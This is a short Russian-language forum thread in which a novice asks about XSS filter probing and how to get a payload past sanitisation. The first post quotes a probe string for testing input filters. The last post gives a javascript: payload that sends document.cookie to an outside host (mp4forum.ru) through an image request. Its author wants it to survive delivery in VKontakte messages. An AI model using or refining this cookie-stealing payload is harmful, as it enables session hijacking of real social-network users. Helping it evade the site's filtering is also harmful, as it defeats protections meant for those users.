извеняюсь если гдето это было я не нашёл... я прочитал: ### А как определить есть фильтр или нет? Просто в любое поле вводим: '';!--"<fuck>=&{()} Дальше открываем html страничку и ищем слово "fuck" и смотри ........... фильтрации вот так: "><>'"`,/\?@% и у меня вопрос.... куда писать ';!--"<fuck>=&{()} да и вобще немоглибы по подробнее расказать про это? и ещё раз извеняюсь...
В статье Микроба всё подробно описано, если мне память не изменяет это как раз из неё пример, почитай ещё статьи про XSS, понимание придёт со временем...
m0Hze тоесть надо в любое место где можно в вести текст... а не в адресную строку. и ещё незнаете как сделать чтобы ...javascript:document.write('<script>img = new Image(); img.src = "http://mp4forum.ru/n1077.gif?"+document.cookie;</script>')... после того как отпровляешь вконтакте сообщении не стоновилось ...javas?1?ript:document.write('<script>img = new Image(); img.src = "http://mp4forum.ru/n1077.gif?"+document.?4??4??1?ki?1?;</script>')...
